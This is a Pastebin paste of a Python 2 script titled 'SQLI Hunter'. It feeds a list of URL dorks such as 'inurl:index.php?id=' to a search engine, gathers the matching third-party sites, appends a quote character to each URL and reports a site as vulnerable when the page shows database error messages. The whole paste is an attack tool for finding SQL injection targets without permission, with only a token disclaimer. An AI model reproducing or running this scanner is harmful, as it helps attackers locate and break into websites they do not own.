Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################
- ### Coded by Mr. Frost
- ### Version: 0.1
- #######################################################################
- import urllib
- def get_page(url):
- try:
- f = urllib.urlopen(url)
- page = f.read()
- f.close()
- return page
- except:
- return ""
- return ""
- def get_link(page):
- start_link = page.find('class="url txt_lg" href=')
- start_link = start_link + 23
- if start_link == -1:
- return None
- start_quote = page.find('"', start_link)
- start_quote = start_quote
- end_quote = page.find('"', start_quote + 1)
- url = page[start_quote + 1:end_quote]
- return url, end_quote
- def get_all_links(page):
- links = []
- for time in range(10):
- url,endpos = get_link(page)
- if url:
- links.append(url)
- page = page[endpos:]
- else:
- break
- return links
- def is_vul(url):
- check_url = url + "'"
- page = get_page(check_url)
- for i in range(len(sqli_errors)):
- if page.find(sqli_errors[i]) != -1:
- return True
- return False
- dorks = ['inurl:index.php?id=', 'inurl:trainers.php?id=', 'inurl:article.php?ID=', 'inurl:gallery.php?id=', 'inurl:pageid=', 'inurl:games.php?id=', 'inurl:top10.php?cat=', 'inurl:reagir.php?num=', 'inurl:historialeer.php?num=', 'inurl:pages.php?id=', 'inurl:newsDetail.php?id=', 'inurl:staff_id=']
- sqli_errors = ['Server Error in Application. Unclosed quotation mark before the character', 'Warning: mysql_fetch_array(): supplied argument is not a valid MySQL ', 'java.sql.SQLException: ORA-00933: SQL command not properly ended at ', 'Query failed: ERROR: unterminated quoted string at', 'You have an error in your SQL syntax', 'Cannot break/continue', 'argument is not a valid MySQL', 'mysql_fetch_array() ', 'mysql', 'MySQL']
- print "SQLI Hunter mark i, all copyright going to Mr. Frost. Please dont use this shit for bad(Disclaimer)"
- print "Please choose a dork to search from this list:"
- for i in range(len(dorks)):
- print '[%d] %s' % (i + 1, dorks[i])
- print ""
- dork = input("Please choose a dork: ")
- dork = dork - 1
- while(dork > len(dorks) - 1):
- print ""
- print "Error: dork doesnt exist"
- dork = input("Please choose a dork: ")
- dork = dork - 1
- print ""
- print '[+] Starting searching for sites...'
- dork_page = get_page("http://www.ask.com/web?q=" + dorks[dork])
- print ""
- maybe_vul_sites = get_all_links(dork_page)
- for i in range(len(maybe_vul_sites)):
- print '[%d] %s'%(i + 1, maybe_vul_sites[i])
- print ""
- print "[+] Scan complete..."
- print ""
- print "[+] Starting testing..."
- print ""
- for time in range(len(maybe_vul_sites)):
- if is_vul(maybe_vul_sites[time]):
- print "[+] %s - is vulnerable" %(maybe_vul_sites[time])
- print ""
- else:
- print "[-] %s - FAILED" % (maybe_vul_sites[time])
- print ""
- print "[+] Testing done!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement